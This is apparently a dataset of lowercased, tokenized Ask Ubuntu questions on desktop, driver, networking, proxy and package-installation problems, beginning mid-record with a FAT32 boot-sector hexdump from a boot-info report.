eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 08 5e 1b |.x.msdos5.0 ... ^.| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 08 00 00 | ... ... .. ? ... ... .| 00000020 00 60 09 00 51 02 00 00 00 00 00 00 02 00 00 00 | ... q ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 01 29 a5 68 ec aa 4e 4f 20 4e 41 4d 45 20 20 |.. ) .h..no name | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | fat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 | { ... ... |.v @ .n..v| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a | @ .a..u..r ... u.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd | ... t..f..-.v @ ... | 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s ... ... f ... @ f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 | ... ? ... ... .af ... | 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.f..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.f.f ... ... ..| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |.. , ... ... } ..| ... | 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 | ... } ... } ... ... ..| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f.~ ... . .fj.fp.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |sfh ... ..b.v @ ... .| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fxfxfxfx.3f ; f.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..n.f ... .| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f ... .v ... .v| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f | @ ... ... ... ... fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |.t ... ..f @ iu..boo| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |tmgr ... ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 | ... ... ... ... ..di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error ... press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art ... ... ... ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa | ... ... ... ... ..u.| 00000200 ========= devices which do n't seem to have a corresponding hard drive : ========= sdc =============================== stderr messages : =============================== cat : /tmp/bootinfo-ghfasxep/tmp_log : no such file or directory cat : /tmp/bootinfo-ghfasxep/tmp_log : no such file or directory no volume groups found
430841	restarting lightdm in ubuntu 12.04 fails	i am running a laptop with ubuntu 12.04 . at work i have a 1080p monitor i attach via hdmi . i notice that if i am at home just working with the laptop screen and then put the laptop to sleep ( just by closing the screen ) , and then bring it into work and plug in the monitor i get sticky edges between the screens ( despite having them disabled ) . if i start my laptop with the hdmi monitor plugged in , i do not suffer from these symptoms . ideally i would love to solve the issue of not having sticky edges at all after plugging in the monitor ( so i donât have to restart my machine ) , but i have had no such luck . one solution i tried to entertain was just restarting the x server . after googling around for a bit , i learned i can write : sudo service lightdm restart or sudo restart lightdm both seem to do the same thing , but lightdm never actually restarts . i just get stuck at the attached screen . any ideas ? http : //i.imgur.com/vxrp2ak.jpg
430842	error at log on screen	i always get an error before logging into ubuntu 13.10.the error says that there is graphics problem.when i say i 'll run the system in low-graphics mode for once it shows me blank screen with just nothing.can anyone help me ?
430844	choosing text mode from boot menu while keeping gui as default	i have found instructions to use text mode as default mode on boot . ( v.g . how do i disable x at boot time so that the system boots in text mode ? ) and how to revert to gui ( v.g . how to revert back to gui as the default interface from cli in ubuntu desktop ? ) . i already have a dual boot system ubuntu + windows . what i would like is that by default ( unatended start ) it loads the gui however i can choose from the start menu a text mode start .
430845	how to upgrade sausy ( 13.10 ) to trusty ( 14.04 ) beta ?	how to upgrade sausy ( 13.10 ) to trusty ( 14.04 ) beta ? i need to upgrade my ubuntu 13.10 to ubuntu 14.04 beta without any format or new installation ! like upgrade that perform on update manager .
430847	workspace related question - how to hide icons in second workspace	i am using ubuntu 13.10 i want to know how i can hide icons in my 2nd workspace while they remain in the first workspace 1 . is it possible ? if there is any other better alternative to work space then please recommend
430849	how to unset default git identity	does anybody know , where is located something like main config of git ? i use netbeans and when i installed git , it created identity from my username and hostname ( stellaireman ) . in my home folder was n't .gitconfig untill i set my new identity , so it created that file . and in that file is just this [ user ] name = david střítežský email = myemail @ gmail.com so i think that somewhere must be some `` parent '' of this config , where is that stellaireman identity saved ( or it is saved somewhere in netbenas ? ) . i tried git config -- global -- unset user.name `` stellaireman '' with no success . my second identity works great but i do n't want 2 indentities there . i 've made a mistake 3 times yet .
430850	how to install gephi on ubuntu saucy	i have tried to add the ppa repo into my machine , and the used apt-get update the error i have got : w : failed to fetch http : //ppa.launchpad.net/rockclimb/gephi-daily/ubuntu/dists/saucy/main/binary-i386/packages 404 not found i tried to search about this error via launchpad/google/gephi but couldnt find the solution .
430853	how do i find my internal ip address ?	i have ubuntu server 12.04 installed so i have no gui . when i do the command ifconfig , i can not find my internl ip address . it says inet addr : 127.0.0.1 . here is output of ifconfig -a : eth0 link encap : ethernet hwaddr 00:06:4f:4a:66 : f0 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:16 : ec:05 : c8:9c broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr 127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1800 errors:0 dropped:0 overruns:0 frame:0 tx packets:1800 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:143896 ( 143.b kb ) tx bytes:143896 ( 143.8 kb ) here are the contents of etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp if someone could edit this for me , the contents of etc/network/interfaces should be on seperate lines . the output of host askubuntu.com was : ; ; connection timed out ; no servers could be reached . i set up owncloud and webmin a few months ago and was using them for a month with no problems . i think the power went off one day 2 months ago and i never turned the server back on until yesterday . i have n't done anything that would have affected the internet setup so i 'm not sure why it does n't work anymore . as far as my network topology goes , i have a pci-e network card for the pc . the ethernet line goes from the network card to a switch , and then to a modem/router from there .
430859	unattended upgrade shuts down the host instead of rebooting it	i have set the flag for automatic reboot of the host when required after an upgrade . unfortunately the host is apparently shut down and not restarted . i did n't check the scripts yet , but i checked that the command 'sudo reboot ' properly reboots the host . this is a serious problem . i had to switch off automatic reboot . it is also difficult to test if it works .
430861	how does polipo/tor become globally used ?	i installed and configured polipo/tor a while back and one of the things that regularly surprises me is this : boot up and firefox , which is configured to use the polipo socks proxy , always goes through tor ( via https : //check.torproject.org ) but chromium does not go through tor , till i 've been booted for a while . i suspected it was some global setting that my browsers knew about , so i tried with curl : $ curl https : //check.torproject.org ... congratulations . this browser is configured to use tor . ... how is this happening ? is there something tor does to grab all outbound port 80/443 ? here 's my /etc/tor/torrc socksport 9050 sockspolicy accept 127.0.0.1 sockspolicy reject * controlport 9051 orport 9300 relaybandwidthrate 300 kb relaybandwidthburst 600 kb dirport 9301 myfamily xxx disabledebuggerattachment 0 exitpolicy reject * : * here 's my /etc/torsocks.conf local = 127.0.0.0/255.128.0.0 local = 127.128.0.0/255.192.0.0 local = 169.254.0.0/255.255.0.0 local = 172.16.0.0/255.240.0.0 local = 192.168.0.0/255.255.0.0 server = 127.0.0.1 server_port = 9050 here 's my /etc/polipo/config socksparentproxy = `` localhost:9050 '' socksproxytype = socks5
430865	juju http-proxy and no_proxy settings	i 'm setting up an environment with juju and maas . the maas environment has no direct internet connection , a proxy must be used . i have configured the juju environment 's proxy using juju set-env http-proxy=http : //my_proxy:8080 and that works , however , when deploying somehting like keystone , there is an installation hook that tries to access localhost , and this request is trying to also go though the proxy . i have tried juju set-env no-proxy or juju set-env no_proxy , but the debug log just shows there is no config field with either name . is there a way to set a no proxy list , and should local addresses bypass the proxy by default ?
430866	upgrading ubuntu via mounted iso	i want ot upgrade from 12.04 ( 32bit ) to latest ( 64bit ) . i have mounted the iso because i dont have cdrom , but i cant find the runable to open the dialog . i have followed this answer and downloaded ubuntu from here . but the dialog is not opening ... thanks ls -la /media/cdrom/ dr-xr-xr-x 1 root root 2048 oct 16 22:14 . drwxr-xr-x 5 root root 4096 mar 7 14:32 .. -r -- r -- r -- 1 root root 134 oct 16 22:13 autorun.inf dr-xr-xr-x 1 root root 2048 oct 16 22:14 boot dr-xr-xr-x 1 root root 2048 oct 16 22:14 casper dr-xr-xr-x 1 root root 2048 oct 16 22:14 .disk dr-xr-xr-x 1 root root 2048 oct 16 22:14 dists dr-xr-xr-x 1 root root 2048 oct 16 22:14 efi dr-xr-xr-x 1 root root 2048 oct 16 22:14 install dr-xr-xr-x 1 root root 18432 oct 16 22:14 isolinux -r -- r -- r -- 1 root root 18022 oct 16 22:14 md5sum.txt dr-xr-xr-x 1 root root 2048 oct 16 22:14 pics dr-xr-xr-x 1 root root 2048 oct 16 22:14 pool dr-xr-xr-x 1 root root 2048 oct 16 22:14 preseed -r -- r -- r -- 1 root root 230 oct 16 22:14 readme.diskdefines lr-xr-xr-x 1 root root 1 oct 16 22:14 ubuntu - > . -r -- r -- r -- 1 root root 2560216 oct 15 15:51 wubi.exe
430867	hibernate dialog apears but does n't hibernate ?	followed this question and now whenever i press the button hibernate it just take me to the login screen . for critical battery i wanted it to hibernate on specific battery % and for that i followed the answer to the question and now what happen is that whenever battery reaches the critical level it just shows a dialog box which says hibernate or cancel honestly i do n't need this i want it to just hibernate and if i happen to be there at the critical time and click hibernate , it shows me the login screen like it does when i click the hibernate button ( mentioned above ) from the menu where shutdown restart are . ubuntu 13.10 and yes sudo pm-hibernate or sudo hibernate works any suggestions ? thanks !
430872	ubuntu high memory usage	i am using ubuntu 12.10 . when booting the ram that is used is about 1-5 gib . however , after a while when i use chrome and skype the ram used is about 4 gib . ( my pc has only 4 gib ram ) . i am not sure how to fix this.if i upgrade to 13.10 will this fix the issue ? thanks
430877	ignoring horizontal scrolling while scrolling vertically	i use two-finger scrolling . i would like to enable horizontal scrolling using dconf editor but when i do , every time i scroll vertically , if i happen to move horizontally even a little , it is detected and results in a horizontal scroll . on an old mac i had some time ago there was an option to ignore the minor axis of movement and respond only to the major axis of the finger movement . is this possible on ubuntu ?
430878	netflix wo n't load	i 've recently had to switch to ubuntu and am fumbling my way through . that being said , please help me be explaining each acronym . i was directed to http : //www.iheartubuntu.com/2012/11/ppa-for-netflix-desktop-app.html this page in order to get everything for running netflix on ubuntu . i did download wine , but when i went to the dash home and opened netflix through there , nothing happens . wine does n't load to get the add-ons , netflix does n't load-nothing happens . any help would be appreciated .
430879	getting genymotion to run on ubuntu	i want to run genymotion on my ubuntu os . i have downloaded and installed the bin file . virtual box is also present and has been detected by the installation . the installed folder is owned by my current username with all access . when i double click on genymotion application , nothing happens . am i missing something that needs to be done ? any ideas .
430880	how do i run update-perl-sax-parsers to get xml : :libxml : :document properly installed ?	i 've just tried to install the perl module xml : :libxml : :document using the cpan shell and at the end of the process it says : please use 'update-perl-sax-parsers ( 8 ) to register this parser . ' see /usr/share/doc/libxml-sax-perl/readme.debian.gz for more info . if i run update-perl-sax-parsers with no arguments it returns almost instantly with no output ( and i still ca n't use xml : :libxml : :document within perl ) if run 'update-perl-sax-parsers -help ' i can see i probably need to specify the -- directory flag or the -- file ( although they have defaults ) perhaps i missing something but i ca n't see where in readme.debian.gz it tells me what options i need either . what step am i missing ? i 'm running on ubuntu 12.04 , perl 5.14 , cpan shell v1.960001 let me know if this is more suited to stackoverflow .
430886	problems with the the ubuntu 13.10 installation on macbook pro 11.2	i am new to ubuntu , but i decided to install it on my newly gained macbook pro 11.2 . i have four issues : in live mode , the screen crushed , i can hardly see clearly unless i plug in an external lcd . in installation , i ca n't see the option install alongside with osx after installation , the screen fixed , but i ca n't get the wifi to work , because there is internal error ( broken count > 0 ) that stops me from using sudo apt-get install bcmwl-kernel-source and any command like sudo apt-get -installwould n't work . dkms is also missing . when i reboot , trying to boot mac , the osx never shows up . for 32-bit , it does n't allow me to boot , for 64-bit , the screen keeps showing nothing for a long time before i reboot . basically , i followed the instruction here : i did n't use refind or refit . i burned the iso into a usb drive and partitioned free space for ubuntu . i highly appreciate if anyone can resolve any of the issues .
430887	general error mounting filesystems	sorry for posting , but i have searched the website ( and a bit the internet ) since yesterday for a solution to my problem , but nothing worked for me so far . i just hope i am not duplicating . due to a system not working fine , i was obliged to turn on and switch off repeatedly my laptop where i have ubuntu 12.04 and windows 7 in dual boot . i ended up with an error message and ubuntu not starting . the message says : general error mounting filesystems . a maintenance shell will now be started . : : no such a file or directory . and two other lines stating the dev/sda6 and dev/sda7 ( respectively my / and /home ) are clean . furthermore , commands like reboot or shutdown will return message saying : ( command here ) did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired or the network connection was broken . i 've done fsck for the 2 partitions with -a and -fv . no chance . i 've checked fstab and it looked ok . i 've tried to reinstall ubuntu 12.04 using the same partitions but the installation said it was successful , but did n't solve the issue . and i 've also tried boot repair that said the grub was fixed ( i think it was fine anyway ) and here is the link it gave me i just do n't know what to try anymore .
430890	multi-user seedbox in ubuntu ?	ok , so i need your help guys , i want to create a seedbox on my spare pc running ubuntu its basically a htpc , so i will be using it via remote in all probabilities . so what i need to do is : have usernames and passwords for login purposes , more than one . be able to log into the torrent client and add/modify their torrent logout but i need to impose restrictions such as : no one can access settings no one can make changes to stuff added by some other id in short , what i aim for is making that machine into a multi user seedbox . it has 2 gb of ram and a tb of hdd space any torrent client is welcome so long as it will do the job . any idea on how we can do it ?
430894	can not log into lubuntu due to x error	after suspending my computer normally , i am unable to log into my desktop . i am running lubuntu 13.10 . any help would be appreciated . here is my .xsession-errors file : script for cjkv started at run_im . script for default started at run_im . init : upstart-dbus-session-bridge main process ( 14136 ) terminated with status 1 init : lxsession main process ( 14133 ) terminated with status 1 xsession : x session started for clin at fri mar 7 08:01:55 cst 2014 localuser : clin being added to access control list script for cjkv started at run_im . script for default started at run_im . unable to create /home/clin/.dbus/session-bus script for cjkv started at run_im . script for default started at run_im . ** message : main.vala:96 : session is ( null ) ** message : main.vala:97 : de is ( null ) ** message : main.vala:101 : no session set , fallback to lxde session ** message : main.vala:107 : no desktop environnement set , fallback to lxde ** message : main.vala:128 : log directory : /home/clin/.cache/lxsession/lxde ** message : main.vala:129 : log path : /home/clin/.cache/lxsession/lxde/run.log xsession : x session started for clin at fri mar 7 08:19:10 cst 2014 localuser : clin being added to access control list script for cjkv started at run_im . script for default started at run_im . unable to create /home/clin/.dbus/session-bus script for cjkv started at run_im . script for default started at run_im . ** message : main.vala:96 : session is ( null ) ** message : main.vala:97 : de is ( null ) ** message : main.vala:101 : no session set , fallback to lxde session ** message : main.vala:107 : no desktop environnement set , fallback to lxde ** message : main.vala:128 : log directory : /home/clin/.cache/lxsession/lxde ** message : main.vala:129 : log path : /home/clin/.cache/lxsession/lxde/run.log xsession : x session started for root at fri mar 7 08:20:42 cst 2014 localuser : root being added to access control list script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . ** message : main.vala:96 : session is ( null ) ** message : main.vala:97 : de is ( null ) ** message : main.vala:101 : no session set , fallback to lxde session ** message : main.vala:107 : no desktop environnement set , fallback to lxde ** message : main.vala:128 : log directory : /home/clin/.cache/lxsession/lxde ** message : main.vala:129 : log path : /home/clin/.cache/lxsession/lxde/run.log
430895	bash history search ( ctrl+r ) in ubuntu suggestions ?	is there an extension of some kind which ties bash 's history search ( which you get with ctrl+r in a terminal ) into the ubuntu search suggestions generated when searching via the windows key ( in gnome3 ) ? something that would , when selecting such a suggestion , just open a terminal and then execute the selected command ?
430897	on each sudo command i get [ sudo ] password for root:	i have run a script https : //github.com/starlilyth/linux-poolmanager to install it and i have run into the situation where on each sudo command i get the prompt : [ sudo ] password for root : the /etc/sudoers looks like this now : -r -- r -- -- - 1 root root 823 mar 7 16:07 /etc/sudoers and i can not access it . what can i do now to restore the system to normal functionality ? edit $ grep sudo /etc/group sudo : x:27 : username
430899	thunderbird does not ( always ) ignore folders	i have configured a number of folders in hotmail where certain e-mails ( like newsletters ) are forwarded to . i installed thunderbird on my home laptop and those folders are never synced , just the way i like it . on my work laptop however , i have the same configuration but more folders are synced and i get a notification every damn time when i get a new e-mail . this annoys me a lot ( because i have +30 unread mails so the overview of new mails is lost ) and i do n't seem to be able to find out how to ignore certain folders . plus , it 's weird that it works on the one system and not on the other . the when getting new messages for this account , always check this folder is unselected in the folder properties . the thunderbird version is thunderbird 24.3.0 and i use ubuntu 12.04 .
430901	ubuntu not working properly in vm workstation 10 ?	i have installed vm workstation 10 and then tried to install ubuntu in it , but after installing , the ubuntu screen only contains the desktop background but no other icons are displaying on the desktop .
430903	upstart-event-bridge main process terminated with status 1	xsession-errors is showing messages of the following type after upgrade to 13.10 : init : upstart-event-bridge main process terminated with status 1 init : upstart-dbus-session-bridge main process ended , respawning is there a known way to correct this or to roll the upgrade back ?
430906	ca n't change the resolution higher than 1024x768	hello complete newbie here . so from the moment i installed ubuntu 12.04 i tried changing the resolution to the maximum supported by my monitor which is 1440x900 . i tried installing the proprietary driver but when i restart , the monitor goes out of range.if i try then and set it with xrandr it says ca n't open display . i uninstalled the driver it goes back to 1024x768 and if i hit xrandr -q it shows the resolutions only till 1024x768 . i 'm out of ideas , i 've searched on the internet like crazy and i do n't know what to do .
430908	installing virtualbox guest additions on ubuntu 12.04	i was trying to install virtualbox-guess-additions-iso , and got the following error : sudo aptitude install virtualbox-guest-additions-iso the following new packages will be installed : libgsoap1 { a } virtualbox { a } virtualbox-dkms { a } virtualbox-guest-additions-iso virtualbox-qt { a } 0 packages upgraded , 5 newly installed , 0 to remove and 1 not upgraded . need to get 0 b/64.0 mb of archives . after unpacking 121 mb will be used . the following packages have unmet dependencies : virtualbox-4.3 : conflicts : virtualbox but 4.1.12-dfsg-2ubuntu0.5 is to be installed . conflicts : virtualbox-guest-additions-iso but 4.1.12-1 is to be installed . the following actions will resolve these dependencies : remove the following packages : 1 ) virtualbox-4.3 accept this solution ? [ y/n/q/ ? ] y the following new packages will be installed : libgsoap1 { a } virtualbox { a } virtualbox-dkms { a } virtualbox-guest-additions-iso virtualbox-qt { a } the following packages will be removed : virtualbox-4.3 { a } 0 packages upgraded , 5 newly installed , 1 to remove and 0 not upgraded . need to get 0 b/64.0 mb of archives . after unpacking 33.0 mb will be freed . do you want to continue ? [ y/n/ ? ] y ( reading database ... 484051 files and directories currently installed . ) removing virtualbox-4.3 ... dpkg : error processing virtualbox-4.3 ( -- remove ) : subprocess installed pre-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : virtualbox-4.3 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover :
430911	being new to ubuntu/linux , how does one match a brand new laptop to the appropriate version of ubuntu ?	i have a brand new lenovo ideapad u530 , pre-installed windows 8.1 64bit 1tb with an ssd . with so many different variations of linux i 'm confused to which one will work the best for my laptop specs . i 've done some research and read many reviews . some issues relating to overheating , issues in bios vs uefi modes , wireless connection problems etc . i would be extremely thankful if someone could recommend wither i should choose ubuntu 12.04 lts , linuxmint , luna , linuxlite , fedora , kubuntu .
430913	ssh to private to my mac ( host only ) network ?	i have been trying to get an install of ubuntu 12.04 running on my mac and have attempted it via virtualbox and vmware fusion 6 . the problem is i need to be able to ssh to the ubuntu 12.04 from os x ( because i prefer the developmental tools of os x and want to be able to test websites on more browsers e.g . safari ) . this used to work problem free before but now every time i boot up ubuntu on a bridged network , my entire house network crashes . i have disabled the bridged adapter now ( on vmware fusion ) and enabled the private to my mac ( host only ) network . now i do n't know how to ssh to ubuntu 12.04 . how would i ssh to ubuntu ? what about the nat network configuration . which of these will work and how . ( i 've tried googling it but i did n't get a solution to my problem ) . thanks !
430914	enable/disable touchpad indicators out of sync	my touchpad is not responsive after login . once logged in , i attempt to enable the mouse using the dedicated hardware button or the fn+f3 key combination . there is an led on the hardware button indicating if the touchpad is enabled or disabled . when the hardware button indicates the touchpad is enabled , the notification for a disabled touchpad is displayed on screen . when using the key combo or button to disable the mouse , the notification for an enabled touchpad is displayed . to clarify , the touchpad does not work ( clicking , cursor , scrolling ) in either case . as if either the hardware or software switch being disabled trumps other settings . so , `` out of sync '' is my description ... i 've read posts and wikis on touchpad issues with no luck . however , this solution fixes the problem - > syanptics touchpad wo n't re-enable is there a way to make this a permanent fix ? msi s600 ( ms-16ds ) laptop . 12.04 . elantech multi touchpad . thanks !
430915	how to autostart a daemon after installation ?	i 'm writing a daemon and packaging it up but i want the daemon to run after install . is there a way to make the daemon run after it gets installed ?
430917	virtualbox-dkms : depends : dkms ( > = 2.1.0.0 ) but it is not going to be installed	sandesh @ sandesh-inspiron-1564 : ~ $ sudo apt-get install virtualbox-dkms reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : virtualbox-dkms : depends : dkms ( > = 2.1.0.0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . sandesh @ sandesh-inspiron-1564 : ~ $ sudo apt-get -f install virtualbox-dkms reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : virtualbox-dkms : depends : dkms ( > = 2.1.0.0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . as shown .. i 've used the -f tag too .. but still im facing problems in satisfying dependencies edit : sandesh @ sandesh-inspiron-1564 : ~ $ sudo apt-get cache e : invalid operation cache sandesh @ sandesh-inspiron-1564 : ~ $ sudo apt-get cache e : invalid operation cache sandesh @ sandesh-inspiron-1564 : ~ $ apt-cache policy virtualbox-dkms dkms virtualbox-dkms : installed : ( none ) candidate : 4.2.16-dfsg-3 version table : 4.2.16-dfsg-3 0 500 http : //us.archive.ubuntu.com/ubuntu/ saucy/multiverse amd64 packages dkms : installed : ( none ) candidate : 2.2.0.3-1.1ubuntu4 version table : 2.2.0.3-1.1ubuntu4 0 500 http : //us.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages 100 /var/lib/dpkg/status so this is the output
430919	getting webgl to run on an amazon ec2 server	i 'm trying to get webgl to work on my amazon ec2 server ( migrating from an office-bound mac mini , that has a lot of hiccups ) . worked some days to get this running , but i 'll try to start from where i started . first i installed the following ami ubuntu server 12.04 lts ( hvm ) - ami-8c8675fb with instance type cg1.4xlarge . i chose that instance type so it comes with a cirrus logic gd 5446 for graphical executions . of course the primary install is headless , so i had to build this server from scratch , what i did firstly is . sudo apt-get install ubuntu-desktop sudo apt-get install gdm sudo /etc/init.d/gdm start sudo dpkg-reconfigure xserver-xorg sudo apt-get install gnome-core after that i installed a lamp server ( the usual ) and i updated the kernel to linux ip-172-31-29-168 3.8.0-37-generic # 53~precise1-ubuntu smp wed feb 19 21:37:54 utc 2014 x86_64 x86_64 x86_64 gnu/linux . i also registered the xorg edgers ppa at https : //launchpad.net/~xorg-edgers/+archive/ppa . after rebooting i had to connect a screen to my server , i chose to do this with vnc4server . so that 's the usual and my xstartup looks like this : # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager # exec /etc/x11/xinit/xinitrc gnome-session -- session=gnome-classic & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & # x-terminal-emulator -geometry 1280x1024+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & after starting my vnc server and connecting it , i checked out my glfxinfo , so display=:1 glxinfo ( display :1 is the vnc ) the first output was : name of display : :1 libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . error : could n't find rgb glx visual or fbconfig error : could n't find rgb glx visual or fbconfig i fixed this one by installing the nvidia-current package . i already knew for webgl to run , i needed glx version 1.3 at least . so i gave glxinfo another swing and that gave the following output : ubuntu @ ip-172-31-29-168 : ~ $ display=:1 glxinfo | grep version xlib : extension `` nv-glx '' missing on display `` :1 '' . xlib : extension `` nv-glx '' missing on display `` :1 '' . server glx version string : 1.2 client glx version string : 1.4 glx version : 1.2 opengl core profile version string : 1.3 mesa 4.0.4 opengl version string : 1.3 mesa 4.0.4 as you can see the glx version is not enough to run webgl , i tried all the guides on this . none of them seem to raise the glx version . you 're probably asking , why webgl , well i had this running on a mac mini server , which worked perfectly to create a nice 3d video . not looking to edit the code , just looking to get it up in the cloud . also tried the windows server , but ran in a lot of issues with ffmpeg there so that 's also not an option . now thinking of getting a mac os cloud server , but still wondering what 's going wrong here . so my question : is it even possible to do this on my amazon ec2 server ? and if so , how ? p.s . when i run chromium-browser from the command-line , this is my error : ubuntu @ ip-172-31-29-168 : ~/.vnc $ display=:1 chromium-browser -- enable-webgl [ 12243:12243:0307/155523 : error : gl_surface_glx.cc ( 413 ) ] glx 1.3 or later is required . [ 12243:12243:0307/155523 : error : gl_surface_x11.cc ( 58 ) ] glsurfaceglx : :initializeoneoff failed .
430923	how do i configure byobu+tmux to start multiple applications on boot so they 're running and available in tabs on first ssh ?	i 've got a few programs that i 've always got running so that when i ssh in to the machine , they 're running on my different byobu screens/tabs/whachamacallits . however , i 've always got to manually start them the first time i ssh in after bootup . how can i make it so that they 're running and available via byobu from the time the machine boots ?
430924	google earth is not working	i am using ubuntu 12.04 lts and i want to install google earth so i went onto it 's official site and downloaded the 64bit.deb package . when i typed : sudo apt-get install google-earth-stable in the terminal , everything went alright and it opened too , but the fly-to feature wont work . so i asked it on askubuntu.com and here is the link to it : how do i search in google earth ? i did what it said and it fixed it . but i can not even open google earth after i shut it down . what can i do to make it work .
430927	hp pavilion dv4 volume randomly goes up and down	i have a pavilion dv4 that i just upgraded to 13.10 and the volume randomly goes up , down , and mute . i first saw it when loading `` steam '' but it seems to happen even if steam is not running . the manual buttons still work but does not stop the increase and decrease of volume . thank you
430929	installing ubuntu 12.04 on raid installation	we have acquired an machine with embedded server raid technology 5.4.1 and trying to install ubuntu 12.04.4 onto it . there are two disks and we have defined one logical volume with raid 1 . then run initialise . we then install ubuntu by booting the livecd from dvd . the install says its successful , but when we go to reboot , the system seems to be picking up a old windows version and the raid now says its in degraded mode . its like the ubuntu install only went on one disk and left the other as the old window system . thoughts please .
430932	how to make gnome terminal to display all the contents of standard output ?	i want to display all the ouput of a command in the gnome terminal ( not minimum or less output ) . for example while i run dpkg -- get-selections command , it displays only the partital output on terminal.but i want the whole list of installed packages . what i have to do ?
430934	nvidia drivers crashes	i wanted to ask , why can i only use nvidia drivers from software updater ? 319.60 ? if i try to install 331.20 or 331.49 after restart computer goes black screen and crashes all the time it seems that 331 just does n't work for me no matter how many times i 've tried to install . ( i 'm using nvidia geforce gt440 card )
430935	ubuntu 12.04 ; how to check if vsync is enabled ?	when i run glxgears i get output like this ; 9012 frames in 5.0 seconds = 1802.212 fps i understand those results to mean that vsync is not enabled otherwise i would be getting 60fps , the current refresh rate of my monitor . is that a correct interpretation of those results ? how do i check if vsync is enabled ? bensley @ htpc-ubuntu : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise bensley @ htpc-ubuntu : ~ $ uname -a linux htpc-ubuntu 3.2.0-60-generic # 91-ubuntu smp wed feb 19 03:54:44 utc 2014 x86_64 x86_64 x86_64 gnu/linux intel ( r ) core ( tm ) i3-4330 cpu @ 3.50ghz ( built in intel hd4600 ) .
430938	failed to download package files . check internet connection for ubuntu software center	i am trying to install vlc media player on ubuntu 12.10 ( wubi ) through the ubuntu software center . but i get the message `` failed to download package files.check internet connection '' even when my internet connection runs fine and i am able to download other softwares . how can i fix this ?
430939	xp pro unbutu install ?	my computer currently has windows xp pro on it . can i just download ubuntu on top of it or must i format and make a clean install ?
